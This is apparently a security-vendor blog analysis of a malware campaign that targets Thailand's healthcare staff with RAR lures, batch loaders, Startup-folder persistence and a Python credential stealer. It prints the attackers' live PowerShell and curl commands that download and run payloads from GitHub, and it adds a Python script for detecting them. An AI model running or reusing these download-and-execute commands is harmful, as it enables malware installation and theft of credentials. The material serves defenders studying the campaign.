Seqrite Labs Blog
19 June 2026

Threat Actors Weaponizing RAR Archives to Target Thailand’s Healthcare Sector

Written by Vaibhav Billade
Category: Technical

Authors: Vaibhav Krushna Billade, Dixit Panchal & Rumana Siddiqui.

Table of Contents

  • Introduction
  • Key Targets
  • Infection Chain
  • Initial Campaign Findings
  • Technical Analysis
    • Stage 1: Initial Delivery (RAR Archive)
    • Stage 2: Rouki-Obfuscated Batch Loader
    • Stage 3: Startup Persistence Script
    • Stage 4: Secondary Payload Execution
    • Stage 5: Information Stealer Deployment (sim.py)
  • Conclusion
  • Seqrite Coverage
  • Indicators of Compromise (IOCs)
  • MITRE ATT&CK Mapping

Introduction

Seqrite Threat Research Unit (TRU) actively tracks and analyses threat actors and their campaigns, focusing on attribution, infrastructure analysis, and adversary tradecraft. Throughout our research, we have attributed numerous operations to China-aligned and other threat clusters targeting both regional and international entities.

During a recent investigation, we identified an active malware campaign targeting Thailand’s healthcare sector, including Ministry of Health personnel and affiliated healthcare organizations. The campaign leverages healthcare-themed spear-phishing lures distributed through malicious RAR archives containing obfuscated batch scripts and executable payloads. The infection chain employs multiple stages of obfuscation, GitHub-hosted payload delivery, persistence mechanisms, and information-stealing malware designed to establish a foothold within targeted environments while evading detection.

Key Targets

The campaign primarily targets personnel and departments across Thailand’s healthcare ecosystem, including:

  • Ministry of Health personnel and government health procurement teams through lures impersonating official medical equipment approval documents.
  • Hospital administration staff through fabricated patient admission request documents.
  • Radiology and dental clinic staff through spoofed medical records and X-ray inquiry files.
  • Clinical and radiological departments through fake patient CT scan result documents.
  • Healthcare supply chain and medical equipment procurement teams through Ministry of Health-branded approval documents.

The lure themes suggest deliberate targeting of healthcare-related functions and demonstrate a strong understanding of operational workflows within the sector.

Infection Chain

RAR Archive → Obfuscated BAT Loader → Rouki-Obfuscated Payload Loader → Startup Persistence Script (WindowSecuryt.bat) → Secondary Batch Payload (u-t2.bat) → Python-Based Information Stealer (sim.py) → Telegram Exfiltration Attempts

Initial Campaign Findings

The earliest identified sample associated with the campaign was uploaded on April 7, 2026, while the most recent observed sample was uploaded on June 3, 2026, indicating an active operational window of approximately ten weeks at the time of analysis.

Key Observations

  • All identified samples were uploaded from Thailand, suggesting the use of in-country staging infrastructure or compromised local systems for distribution.
  • The threat actor distributes malware through RAR archives containing malicious batch scripts and executables disguised as healthcare- and government-related documents.
  • Lure filenames are tailored to specific job functions, including administrative, clinical, radiology, and procurement personnel, indicating either prior reconnaissance of healthcare organizations or a broad targeting strategy informed by sector-specific knowledge.
  • All observed samples utilize a consistent RAR → BAT → Payload execution chain, suggesting a standardized toolset and repeatable delivery methodology.

Technical Analysis

Stage 1: Initial Delivery (RAR Archive)

The initial infection vector consists of a malicious RAR archive containing an obfuscated batch file that functions as the first-stage loader. Obfuscation is employed extensively to conceal functionality and hinder static analysis.

One observed sample, Health_Ministry_Approved_Equipment_2026.bat, creates a temporary file containing encoded payload data and leverages PowerShell to decode the embedded content. The decoded content is then written to a secondary batch file, which is subsequently executed.

Following execution, temporary artifacts are removed to reduce forensic evidence and complicate post-compromise investigations.

The use of embedded payload data, PowerShell-based decoding routines, and cleanup operations indicates a deliberate effort to conceal malicious functionality and evade security controls.

Stage 2: Rouki-Obfuscated Batch Loader

The decoded payload.bat executed during Stage 1 was heavily obfuscated using a framework identified as Rouki.

Analysis revealed that the script dynamically reconstructs and executes PowerShell commands that download, persist, and execute additional malware components. The use of GitHub-hosted payloads, deceptive file extensions, and multi-stage execution provides operational flexibility while reducing the likelihood of detection.

PowerShell Command 1 – Persistence Deployment

powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ud-7-te/ud-vtn/raw/main/up-t2.png', 'C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat');"

This command downloads a remotely hosted file masquerading as a PNG image and stores it as WindowSecuryt.bat within the Windows Startup folder.

Placement within the Startup directory ensures automatic execution whenever the user logs into the system, thereby establishing persistence.

PowerShell Command 2 – Payload Deployment

powershell.exe -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/d7-te/vtn/raw/main/T2.zip', 'C:\Users\Public\Desktops.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Public\Desktops.zip', 'C:\Users\Public\Desktops'); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip"

This command downloads a ZIP archive, extracts its contents to a publicly accessible directory, and executes the embedded Python-based payload (sim.py) using a bundled Python interpreter.

After execution, the ZIP archive is deleted to minimize forensic artifacts and hinder incident response efforts.

Stage 3: Startup Persistence Script (WindowSecuryt.bat)

Analysis of the downloaded WindowSecuryt.bat script revealed that it contains a significant amount of junk data and obfuscation logic similar to that observed in earlier-stage batch loaders. This non-functional content is intended to hinder static analysis and conceal the script’s true execution flow.

Upon execution, the script performs a privilege check and environment setup before reaching its final functional stage, where it reconstructs and executes the following command:

cmd /c "curl hxxps://raw.githubusercontent.com/ud-7-te/ud-vtn/main/ud-t2.txt -o C:\Users\admin\AppData\Local\Temp\u-t2.bat && call C:\Users\admin\AppData\Local\Temp\u-t2.bat"

This command uses curl to download an additional batch payload (u-t2.bat) from a GitHub-hosted repository and stores it in the system’s temporary directory (%TEMP%). The use of the %TEMP% path ensures write access without requiring elevated permissions in most environments.

After successful download, the script immediately executes the payload using the call command, enabling continuation of the multi-stage infection chain.

In addition, the script's placement within the Windows Startup folder ensures it is executed automatically at every user logon. Because the script only retrieves and runs whatever is currently hosted in the remote GitHub repository, the threat actor can update the malicious functionality without touching the original persistence mechanism, giving flexible, long-term control over the infection chain.

Stage 4: Secondary Payload Execution (u-t2.bat)

Analysis of the downloaded u-t2.bat script revealed that it contains junk code and obfuscated sections similar to earlier batch components in the infection chain. These non-functional elements appear at the beginning of the script and are intended to hinder static analysis and conceal the actual execution flow. The meaningful logic is embedded deeper within these obfuscated segments and is resolved only during runtime execution.

The script attempts to relaunch itself with elevated privileges to gain higher-level access on the system.

Upon successful elevation, the script proceeds to execute the next-stage payload while minimizing user visibility.

The final stage of execution triggers the following payload:

powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py"

This command launches the previously deployed Python interpreter and executes sim.py while suppressing visible execution windows.

The use of a bundled Python runtime enables execution independent of any existing Python installation on the victim system and reduces deployment dependencies.
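The Stage 2 to Stage 4 commands above share a handful of traits a defender can hunt for in process-creation telemetry: a download whose destination is the Startup folder, a source URL with an image or text extension saved as a script, a download into %TEMP% followed by an immediate call, an archive extracted under C:\Users\Public, a Python interpreter launched from that directory, and the downloaded file deleted in the same command. The following is an added example, not code from the report or from Seqrite, that encodes those traits as heuristics and runs them over constructed command lines modelled on the ones quoted above (the org/repo names, the user name and the benign control event are placeholders).

```python
import ntpath
import posixpath
import re
from urllib.parse import urlparse

# Constructed process-creation command lines modelled on the Stage 2-4 commands
# quoted in this report. EXAMPLE-ORG/EXAMPLE-REPO and "user" are placeholders.
SAMPLE_EVENTS = [
    r'''powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/raw/main/up-t2.png', 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat');"''',
    r'''powershell.exe -Command "(New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/raw/main/T2.zip', 'C:\Users\Public\Desktops.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Public\Desktops.zip', 'C:\Users\Public\Desktops'); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip"''',
    r'''cmd /c "curl https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/ud-t2.txt -o C:\Users\user\AppData\Local\Temp\u-t2.bat && call C:\Users\user\AppData\Local\Temp\u-t2.bat"''',
    r'''powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py"''',
    r'''powershell.exe -Command "Get-ChildItem 'C:\Users\user\Documents' | Measure-Object"''',  # benign control
]

# WebClient.DownloadFile(url, dst) or curl <url> -o <dst>
DOWNLOAD_RE = re.compile(
    r"DownloadFile\(\s*['\"](?P<url>[^'\"]+)['\"]\s*,\s*['\"](?P<dst>[^'\"]+)['\"]\s*\)"
    r"|curl\s+(?P<curl_url>\S+)\s+-o\s+(?P<curl_dst>\S+)",
    re.IGNORECASE,
)
STARTUP_DIR = "\\start menu\\programs\\startup\\"
DECOY_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".txt"}   # look like harmless data
SCRIPT_EXTS = {".bat", ".cmd", ".ps1", ".vbs", ".js", ".exe"}


def _url_ext(url):
    return posixpath.splitext(urlparse(url).path)[1].lower()


def extract_downloads(cmdline):
    """Return (url, destination) pairs for every DownloadFile or curl -o in cmdline."""
    return [(m.group("url") or m.group("curl_url"), m.group("dst") or m.group("curl_dst"))
            for m in DOWNLOAD_RE.finditer(cmdline)]


def classify(cmdline):
    """Return the set of heuristic names that fire for a single command line."""
    hits = set()
    lowered = cmdline.lower()
    for url, dst in extract_downloads(cmdline):
        dst_l = dst.lower()
        if STARTUP_DIR in dst_l:
            hits.add("download_to_startup_folder")                # Stage 2, command 1
        if _url_ext(url) in DECOY_EXTS and ntpath.splitext(dst_l)[1] in SCRIPT_EXTS:
            hits.add("decoy_extension_renamed_to_script")         # .png/.txt saved as .bat
        if "\\temp\\" in dst_l and re.search(r"&&\s*(call\s+)?" + re.escape(dst), cmdline, re.I):
            hits.add("download_then_execute_from_temp")           # Stage 3
        if re.search(r"\bdel\s+" + re.escape(dst), cmdline, re.I):
            hits.add("downloaded_file_deleted_in_same_command")   # anti-forensic cleanup
    if "extracttodirectory(" in lowered and "c:\\users\\public" in lowered:
        hits.add("archive_extracted_to_public_dir")               # Stage 2, command 2
    if re.search(r"c:\\users\\public\\\S*python", lowered):
        hits.add("bundled_python_from_public_dir")                # Stage 2 / Stage 4
    if hits and "-windowstyle hidden" in lowered:
        hits.add("hidden_window")
    return hits


def triage(events):
    """Map each suspicious event index to its sorted heuristic names; clean events are omitted."""
    report = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            report[i] = sorted(hits)
    return report


if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}")
```

Against real Sysmon Event ID 1 or Windows 4688 data, feed the CommandLine field into classify(); two or more heuristics firing on one event, or any single hit touching the Startup folder, merits a look at the written file and the originating archive.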

Stage 5: Information Stealer Deployment (sim.py)

The final payload identified during analysis is sim.py, a Python-based information stealer executed through the bundled Python environment.

Following execution, the malware terminates multiple web browsers, including Google Chrome, Microsoft Edge, Brave, and other Chromium-based browsers, using taskkill commands. This behavior is commonly associated with information-stealing malware seeking access to browser databases, credential stores, cookies, and session artifacts that would otherwise be locked by the running browser processes.

Observed Capabilities

  • Collects browser-related data.
  • Harvests stored credentials and session information.
  • Stages collected data within temporary directories.
  • Compresses harvested data into ZIP archives.
  • Attempts exfiltration through Telegram-based infrastructure.

Execution logs revealed repeated attempts to transmit stolen data to attacker-controlled Telegram channels using hardcoded bot tokens and chat identifiers via the Telegram Bot API.

The exfiltration requests included victim-specific metadata such as:

  • System identifiers
  • Username information
  • Harvested data counters
  • Archive references

Although observed exfiltration attempts failed due to connectivity timeouts when communicating with api.telegram.org, the combination of browser data harvesting, local staging, archive creation, and attempted transmission confirms the payload’s information-stealing capabilities.

Overall, the malware exhibits characteristics commonly associated with modern Python-based stealers, including credential theft, session cookie harvesting, local data staging, archive generation, and Telegram-based exfiltration mechanisms.

The use of GitHub-hosted payload delivery, legitimate system utilities, layered obfuscation, and multi-stage execution contributes to both operational flexibility and defence evasion.

Conclusion

TRU assesses with moderate confidence that this campaign represents a targeted effort against Thailand’s healthcare sector, leveraging healthcare-themed social engineering lures, multi-stage batch loaders, GitHub-hosted payload infrastructure, and Python-based information-stealing malware.

The campaign demonstrates a repeatable delivery methodology consisting of RAR archives, heavily obfuscated batch scripts, persistence through Startup folder abuse, staged payload retrieval, and Telegram-based exfiltration attempts.

While no definitive attribution could be established based on the currently available evidence, the operational consistency observed across samples suggests the activity is being conducted by a single threat actor or closely related cluster. Continued monitoring of associated infrastructure, payload evolution, and victimology may provide additional insights into attribution and campaign objectives.

Organizations within the healthcare sector should remain vigilant against document-themed phishing campaigns, monitor for unauthorized Startup-folder modifications, and restrict the execution of untrusted scripts and binaries obtained from external sources.

Seqrite Coverage:

  • Script.Trojan.Downloader.50836.GC
  • cld.script.trojan.1759432951

Indicators of Compromise (IOCs):

| File Name | SHA256 |
| --- | --- |
| Health_Ministry_Approved_Equipment_2026.rar | E5F6D9D405819E6B05B5D8268A2E973294859AD65237EDE36AB612B536D0AC2B |
| Health_Ministry_Approved_Equipment_2026.bat | 4EEBC38297A307D18784D6F9EBC8AA6E6F69860BE970CC70D9E544DEB1FF6CE0 |
| payload.bat | F4D4B8CAC004BB63834C6DF436721BABD9464C09787C80B268D839E0AADA9F87 |
| WindowSecuryt.bat | 74BB6AD7E1310F30A3E24FD3CBBFFA2C0C41C64E89E5D0DD1D6900E96B914183 |
| u-t2.bat | 7709D8C34D490509F3624104611EB75A862944DD9D7A642F44514ADA16C85EE9 |
| Desktops.zip | 523388567630E4FBDC359F75232BF2AD82671A680D4BFDCE0237FC30DFEC4C80 |
| Stealer (sim.py) | 442E0F4E822842922E7E4685840194E99FD68C7F0EC38C1925914B8F724D5865 |

MITRE ATT&CK Mapping:

| Tactic | Technique Name | Technique ID |
| --- | --- | --- |
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 |
| Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Execution | User Execution: Malicious File | T1204.002 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Defense Evasion | Masquerading (BAT disguised as PNG/TXT) | T1036 |
| Defense Evasion | Indicator Removal on Host: File Deletion | T1070.004 |
| Persistence | Registry Run Keys / Startup Folder | T1547.001 |
| Persistence | Scheduled Execution via Startup Folder | T1547 |
| Privilege Escalation | Abuse Elevation Control Mechanism | T1548 |
| Discovery | System Owner/User Discovery | T1033 |
| Credential Access | Credentials from Password Stores | T1555 |
| Credential Access | Credentials from Web Browsers | T1555.003 |
| Collection | Archive Collected Data | T1560 |
| Collection | Data from Local System | T1005 |
| Collection | Data from Information Repositories | T1213 |
| Command and Control | Ingress Tool Transfer (GitHub-hosted payloads) | T1105 |
| Command and Control | Application Layer Protocol: Web Protocols (HTTPS) | T1071.001 |
| Command and Control | Proxy Through Legitimate Services (GitHub) | T1102 |
| Exfiltration | Exfiltration Over Web Service (Telegram Bot API) | T1567 |
| Exfiltration | Exfiltration to Cloud Storage/Web Service | T1567.002 |
